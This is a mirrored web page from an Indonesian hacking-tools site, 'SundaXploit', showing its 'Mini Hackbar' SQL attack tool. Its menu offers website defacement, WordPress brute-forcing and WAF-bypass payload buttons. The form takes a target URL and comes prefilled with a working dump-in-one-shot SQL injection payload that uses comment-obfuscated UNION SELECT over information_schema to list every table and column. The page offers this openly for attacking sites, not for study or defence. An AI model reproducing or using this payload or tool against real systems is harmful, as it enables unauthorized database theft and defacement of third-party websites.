


<!-- Mirrored from sundaxploit.com/tools/sql.php by HTTrack Website Copier/3.x [XR&CO'2017], Thu, 24 Dec 2020 07:33:09 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="decription" content="free tools online for hacking and pentester">
    

    <!-- Favicon -->
    <link rel="shortcut icon" href="assets/media/image/icon.png"/>

    <!-- Main css -->
    <link rel="stylesheet" href="vendors/bundle.css" type="text/css">

    <!-- Google font -->
    <link href="../../external.html?link=https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&amp;display=swap" rel="stylesheet">
    
    <!-- Awesome font -->
    <link rel="stylesheet" href="../../cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

    <!-- Daterangepicker -->
    <link rel="stylesheet" href="vendors/datepicker/daterangepicker.css" type="text/css">

    <!-- DataTable -->
    <link rel="stylesheet" href="vendors/dataTable/datatables.min.css" type="text/css">

<!-- App css -->
    <link rel="stylesheet" href="assets/css/app.min.css" type="text/css">

   <!--  [if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif] -->
</head>
<body class="dark">
<!-- Preloader -->

<!-- ./ Preloader -->



<!-- Layout wrapper -->
<div class="layout-wrapper">

    <!-- Header -->
    <div class="header d-print-none">
        <div class="header-container">
            <div class="header-left">
                <div class="navigation-toggler">
                    <a href="#" data-action="navigation-toggler">
                        <i data-feather="menu"></i>
                    </a>
                </div>

                <div class="header-logo">
                    <a href="../../external.html?link=https://sundaxploit.com/">
                        <img width="180" height="45" class="logo" src="assets/media/image/logo.png" alt="logo">
                    </a>
                </div>
            </div>

            <div class="header-body">
                <div class="header-body-right">
                    <ul class="navbar-nav">
                       
                    </ul>
                </div>
            </div>

            <ul class="navbar-nav ml-auto">
                <li class="nav-item header-toggler">
                    <a href="#" class="nav-link" title="Fullscreen" data-toggle="fullscreen">
                                <i class="maximize" data-feather="maximize"></i>
                                <i class="minimize" data-feather="minimize"></i>
                            </a>
                </li>
            </ul>
        </div>
    </div>
    <!-- ./ Header -->

    <!-- Content wrapper -->
    <div class="content-wrapper">
        <!-- begin::navigation --><head><title>Mini Hackbar | SundaXploit</title></head>
<div class="navigation">
            <div class="navigation-header">
                <span>Tools Online ON SundaXploit</span>
                <a href="index-3.html#">
                    <i class="ti-close"></i>
                </a>
            </div>
            <div class="navigation-menu-body">
                <ul>
                    <li>
                        <a  href="../../external.html?link=http://sundaxploit.com/tools">
                    <span class="nav-link-icon">
                        <i data-feather="home"></i>
                    </span>
                            <span>Home Tools</span>
                        </a>
                    </li>
                    <li>
                        <a  href="../../external.html?link=http://sundaxploit.com/forum">
                    <span class="nav-link-icon">
                        <i class="ti-agenda"></i>
                    </span>
                            <span>Forum</span>
                        </a>
                    </li>
                    <li>
                        <a href="#">
                    <span class="nav-link-icon">
                        <i data-feather="file-text"></i>
                    </span>
                            <span>String</span>
                            <span class="badge badge-success">3</span>
                        </a>

                        <ul>
                            <li><a href=obs.html><i class="fa fa-genderless"> PHP Obfuscator</i> </a></li>
                            <li><a href=decode-encode.html><i class="fa fa-genderless"> Decode Encode</i></a></li>
                            <li><a href=eval.html><i class="fa fa-genderless"> Eval Encoding - Dcoding </i></a></li>
                        </ul>
                    </li>
                    <li>
                        <a href="index-3.html#">
                    <span class="nav-link-icon">
                        <i data-feather="edit-3"></i>
                    </span>
                            <span>Generator</span>
                            <span class="badge badge-success">2</span>
                        </a>
                        <ul>
                            <li><a href=jso.html><i class="fa fa-genderless"> Jso Generator</i></a></li>
                                <li><a href=depes.html><i class="fa fa-genderless"> Generator SC deface v1</i></a></li>
                        </ul>
                    </li>
                    <li>
                        <a href="index-3.html#">
                    <span class="nav-link-icon">
                        <i class="fa fa-user-secret"></i>
                    </span>
                            <span>Defacer</span>
                            <span class="badge badge-success">7</span>
                        </a>
                        <ul>
                            <li><a  href=admin-finder.html><i class="fa fa-genderless"> Admin Finder</i></a></li>
                                <li><a href=wpbf.html><i class="fa fa-genderless"> Wordpress BF</i></a></li>
                                <li><a href=zoneh.html><i class="fa fa-genderless"> Zone-H Notifer</i></a></li>
                                <li><a href=csrf.html><i class="fa fa-genderless"> CSRF Online</i></a></li>
                                <li><a href=http.html><i class="fa fa-genderless"> HTTP Test  </i></a></li>
                                <li><a href="auto-sql.html"><i class="fa fa-genderless">Auto Sql Lokomed</i></a></li>
                                <li><a class="active"href="sql.html"><i class="fa fa-genderless">Mini Hackbar</i></a></li>
                                </ul>
                            </li>
                            
                            <li>
                                <a href="index-3.html#">
                                    <span class="nav-link-icon">
                                    <i class="fas fa-bug"></i>
                                    </span>
                                    <span>Chacker</span>
                                    <span class="badge badge-success">4</span>
                                </a>
                                <ul>
                                    <li><a href=iptrack.html><i class="fa fa-genderless"> Ip Look Up</i></a></li>
                                <li><a href=proxy.html><i class="fa fa-genderless"> Proxy</i></a></li>
                                <li><a href=whois.html><i class="fa fa-genderless">whois</i></a></li>
                                <li><a href=dnsz.html><i class="fa fa-genderless">DNS Look up</i></a></li>
                                </ul>
                            </li>

                    <li>
                        <a href="index-3.html#">
                    <span class="nav-link-icon">
                        <i class="fa fa-cubes"></i>
                    </span>
                            <span>Other</span>
                            <span class="badge badge-success">1</span>
                        </a>
                        <ul>
                            <li><a href=nulis.html><i class="fa fa-genderless"> BOT Nulis</i></a></li>
                        </ul>
                    </li>
                           
                </ul>
            </div>
        </div>
        <!-- end::navigation -->
<!-- mengambil file log.php  -->
	<!-- Content body -->
    <div class="content-body">
        <!-- Content -->
        <div class="content ">
    		<div class="page-header">
		        <div>
		            <h3>Sql Attack</h3>
		            <nav aria-label="breadcrumb">
		                <ol class="breadcrumb">
		                    <li class="breadcrumb-item">
		                        <a href="../../external.html?link=http://sundaxploit.com/">Home</a>
		                    </li>
		                    <li class="breadcrumb-item">
		                        <a href="../../external.html?link=http://sundaxploit.com/tools">Tools</a>
		                    </li>
		                    <li class="breadcrumb-item active" aria-current="page">Mini Hackbar</li>
		                </ol>
		            </nav>
		        </div>
    		</div>
    		<div class="row">
        		<div class="col-md-12">
        			 <div class="card">
                		<div class="card-body">
                            <h4 class="card-title">Dios </h4>
                            <ul class="nav nav-tabs mb-3" role="tablist">
                              <li class="nav-item">
                                <a class="nav-link active" id="soot-tab" data-toggle="tab" href="#soot" role="tab"
                                   aria-controls="soot" aria-selected="true">DUMP IN ONE SHOOT</a>
                              </li>
                              <li class="nav-item">
                                <a class="nav-link" id="sysv-tab" data-toggle="tab" href="#sysv" role="tab"
                                   aria-controls="sysv" aria-selected="false">SYSTEM VARIABLES</a>
                              </li>
                              <li class="nav-item">
                                <a class="nav-link" id="OTHERS-tab" data-toggle="tab" href="#OTHERS" role="tab"
                                   aria-controls="OTHERS" aria-selected="false">OTHERS</a>
                              </li>
                              <li class="nav-item">
                                <a class="nav-link" id="waf-tab" data-toggle="tab" href="#waf" role="tab"
                                   aria-controls="waf" aria-selected="false">bypass waf</a>
                              </li>
                            </ul>
                            <div class="tab-content">
                              <div class="tab-pane fade show active" id="soot" role="tabpanel" aria-labelledby="soote-tab">
                                <tr><td class="text-center">
                            <button onclick="dios1()" class="btn btn-outline-secondary btn-uppercase">Dios 1</button> 
                            <button onclick="dios2()" class="btn btn-outline-secondary btn-uppercase">Dios 2</button>
                            <button onclick="dios3()" class="btn btn-outline-secondary btn-uppercase">Dios 3</button>
                            <button onclick="dios4()" class="btn btn-outline-secondary btn-uppercase">Dios 4</button>
                            <button onclick="xssdios()" class="btn btn-outline-secondary btn-uppercase">XssDios </button>
                            <button onclick="trjn()" class="btn btn-outline-secondary btn-uppercase"> Trojan 1 </button>
                            <button onclick="trjnx()" class="btn btn-outline-secondary btn-uppercase"> Trojan 2 </button>
                            <button onclick="bypsfrm()"class="btn btn-outline-secondary btn-uppercase"> Bypass From </button>

                            <button onclick="postgre()" class="btn btn-outline-secondary btn-uppercase"> Postgre </button>
                            <button onclick="mssql()" class="btn btn-outline-secondary btn-uppercase"> Mssql </button>
                            <button onclick="bof()" class="btn btn-outline-secondary btn-uppercase"> BOF </button>
                            <button onclick="mydios2()" class="btn btn-outline-secondary btn-uppercase"> Mydios 2 </button>
                            <button onclick="arif()" class="btn btn-outline-secondary btn-uppercase"> Mr.p3mu14 </button>
                            <button onclick="awn()" class="btn btn-outline-secondary btn-uppercase"> Awn </button>
                            <button onclick="ebf()" class="btn btn-outline-secondary btn-uppercase"> ErrBased </button>
                            <button onclick="poligon()" class="btn btn-outline-secondary btn-uppercase"> Poligon </button>
                            <button onclick="multipoint()" class="btn btn-outline-secondary btn-uppercase"> Multipoint </button>
                            </td></tr>
                              </div>

                            <div class="tab-pane fade" id="sysv" role="tabpanel" aria-labelledby="sysv-tab">
                            <ul><td>VERSION </td><td class="text-center"><button onclick="version1()" class="btn btn-outline-warning btn-rounded btn-uppercase">Version 1</button>
                            <button onclick="version2()" class="btn btn-outline-warning btn-rounded btn-uppercase">Version 2</button>
                            <button onclick="version3()" class="btn btn-outline-warning btn-rounded btn-uppercase">Version 3</button>
                            <button onclick="version4()" class="btn btn-outline-warning btn-rounded btn-uppercase">Version 4</button>
                            <button onclick="version5()"class="btn btn-outline-warning btn-rounded btn-uppercase">Version 5</button>
                            </td></ul>

                            <ul><td>USER </td><td class="text-center"><button onclick="user1()"class="btn btn-outline-warning btn-rounded btn-uppercase">User 1</button>
                            <button onclick="user2()"class="btn btn-outline-warning btn-rounded btn-uppercase">User 2</button>
                            <button onclick="user3()"class="btn btn-outline-warning btn-rounded btn-uppercase">User 3</button>
                            <button onclick="user4()"class="btn btn-outline-warning btn-rounded btn-uppercase">User 4</button>
                            <button onclick="user5()"class="btn btn-outline-warning btn-rounded btn-uppercase">User 5</button>
                            <button onclick="user6()"class="btn btn-outline-warning btn-rounded btn-uppercase">User 6</button></td></ul>

                            <ul><td>DATABASE </td><td class="text-center"> <button onclick="db1()"class="btn btn-outline-warning btn-rounded btn-uppercase">Database 1</button>
                            <button onclick="db2()"class="btn btn-outline-warning btn-rounded btn-uppercase">Database 2</button>
                            <button onclick="db3()"class="btn btn-outline-warning btn-rounded btn-uppercase">Database 3</button></td></ul></center>



                            <ul><td class="text-center">
                            <button onclick="o1()"class="btn btn-outline-warning btn-rounded btn-uppercase"> @@HOSTNAME </button>
                            <button onclick="o2()"class="btn btn-outline-warning btn-rounded btn-uppercase"> @@VERSION_COMPILE_MACHINE </button>
                            <button onclick="o3()"class="btn btn-outline-warning btn-rounded btn-uppercase"> @@VERSION_COMPILE_OS </button>
                            <button onclick="o4()"class="btn btn-outline-warning btn-rounded btn-uppercase"> @@BASEDIR </button>
                            <button onclick="o5()"class="btn btn-outline-warning btn-rounded btn-uppercase"> @@HV_OPENSSL </button>
                            <button onclick="o6()"class="btn btn-outline-warning btn-rounded btn-uppercase"> @@HV_SYMLINK </button>
                            <button onclick="o7()"class="btn btn-outline-warning btn-rounded btn-uppercase"> @@PORT </button>
                            <button onclick="o8()"class="btn btn-outline-warning btn-rounded btn-uppercase"> @@SOCKET </button>
                            </td></ul>
                              </div>
                              <div class="tab-pane fade" id="OTHERS" role="tabpanel" aria-labelledby="OTHERS-tab">
                                <tr><td class="text-center">
                                <button onclick="xssqli()"class="btn btn-outline-primary"> PopUP </button>
                                <button onclick="kolom()"class="btn btn-outline-primary"> Generate Column </button>
                                <button onclick="mydios()"class="btn btn-outline-primary"> MyDios </button>
                                <button onclick="hx()"class="btn btn-outline-primary"> Hex </button>
                                <button onclick="cn()"class="btn btn-outline-primary"> Convert </button>
                                <button onclick="cs()"class="btn btn-outline-primary"> Cast </button>
                                <button onclick="cp()"class="btn btn-outline-primary"> Compress </button>
                                <button onclick="aes()"class="btn btn-outline-primary"> Aes </button>
                                </td></tr>

                                <tr><td class="text-center">
                                <button onclick="dbc()"class="btn btn-outline-primary"> Total Databases </button>
                                <button onclick="tottbl()"class="btn btn-outline-primary"> Total Tables </button>
                                <button onclick="totcol()"class="btn btn-outline-primary"> Total Columns </button>
                                <button onclick="tblc()"class="btn btn-outline-primary"> Total Col </button>
                                <button onclick="countdb()"class="btn btn-outline-primary"> Count DB </button>
                                <button onclick="about()"class="btn btn-outline-primary"> About </button>
                                </td></tr>
                              </div>
                              <div class="tab-pane fade" id="waf" role="tabpanel" aria-labelledby="waf-tab">
                                <ul><td>union </td><td class="text-center">
                                <button onclick="union1()"class="btn btn-outline-info">union 1</button>
                                <button onclick="union2()"class="btn btn-outline-info">union 2</button>
                                <button onclick="union3()"class="btn btn-outline-info">union 3</button>
                                <button onclick="union4()"class="btn btn-outline-info">union 4</button>
                                <button onclick="union5()"class="btn btn-outline-info">union 5</button>
                                <button onclick="union6()"class="btn btn-outline-info">union 6</button>
                                </td></ul>

                                <ul><td>others </td><td class="text-center">
                                <button onclick="order1()"class="btn btn-outline-info">order by</button>
                                <button onclick="order2()"class="btn btn-outline-info">order by 2</button>
                                <button onclick="userr()"class="btn btn-outline-info">User</button>
                                <button onclick="dtba()"class="btn btn-outline-info">databse</button>
                                <button onclick="ver()"class="btn btn-outline-info">version</button></td></ul>
                                  </div>
                            </div>
                        </div>
                         <div class="card">
                                <div class="card-body">
                                   <textarea id="dios"class="form-control" placeholder="Output"></textarea><br><center>
                                    <button class="btn btn-primary" onclick="copy2()">Copy DIOS</button></center>
                                </div>
                            </div>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-md-12">
                            <div class="card">
                                <div class="card-body">
                                    <h4 class="card-title">Inj3ted</h4>

                                    <form action="../../external.html?link=http://sundaxploit.com/tools/sql.php?auto=sql" method="POST" class="needs-validation" novalidate>

                                        <div class="col-md-12">
                                        <label for="validationTooltip01">Target Anda</label>
                                        <input type="url" name="url" class="form-control" id="validationTooltip01" placeholder="https://google.com/[path]/upload.php" required>
                                        <div class="invalid-feedback">
                                                masukan target bro pake https:// or http://
                                        </div>
                                                <div class="valid-feedback">
                                                nice bro!!
                                                </div>
                                            </div>
                                        <div class="form-group">
                                            <label>input dios:</label>
                                          <textarea style='height: 200px;'class="form-control" name="dioss">+AND+0+/*!50000UniON+SeLeCt*/+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3--+-
                                          </textarea>
                                        </div>
                                  <input type="submit" value="Xploit" name="submit" class="btn btn-primary">

                                </form>
                                <script type="text/javascript">
                                    (function() {
                                  'use strict';
                                  window.addEventListener('load', function() {
                                    var forms = document.getElementsByClassName('needs-validation');
                                    var validation = Array.prototype.filter.call(forms, function(form) {
                                      form.addEventListener('submit', function(event) {
                                        if (form.checkValidity() === false) {
                                          event.preventDefault();
                                          event.stopPropagation();
                                        }
                                        form.classList.add('was-validated');
                                      }, false);
                                    });
                                  }, false);
                                })();
                                </script>
                                                                   
                                </div>
                            </div>
                        </div>
            </div>
        </div>
    </div>
    
    
</div>
<!-- Footer -->
            <footer class="content-footer">
                <div>© 2020 SundaXploit - Development by <a href="../../external.html?link=http://p3mu14.my.id/" target="_blank">Mr.p3mu14</a></div>
                
            </footer>
            <!-- ./ Footer -->
        </div>
        <!-- ./ Content body -->
    </div>
    <!-- ./ Content wrapper -->
</div>
<!-- ./ Layout wrapper -->

<!-- Main scripts -->
<script src="vendors/bundle.js"></script>

    <!-- Apex chart -->
    <script src="vendors/charts/apex/apexcharts.min.js"></script>

    <!-- Daterangepicker -->
    <script src="vendors/datepicker/daterangepicker.js"></script>
    <!-- fontawesome  -->
    <script src="../../kit.fontawesome.com/a05d208e12.js" crossorigin="anonymous"></script>
    <!-- DataTable -->
    <script src="vendors/dataTable/datatables.min.js"></script>

    <!-- Dashboard scripts -->
    <script src="assets/js/examples/pages/dashboard.js"></script>
    <script type="text/javascript" src="assets/js/examples/datatable.js"></script>
    <script type="text/javascript">
        $(document).ready(function (){
    $('#tools').DataTable();
});
    </script>
<!-- App scripts -->
<script src="assets/js/app.min.js"></script>
</body>

<!-- Mirrored from sundaxploit.com/tools/sql.php by HTTrack Website Copier/3.x [XR&CO'2017], Thu, 24 Dec 2020 07:33:09 GMT -->
</html>
    <script type="text/javascript" src="string.js"></script>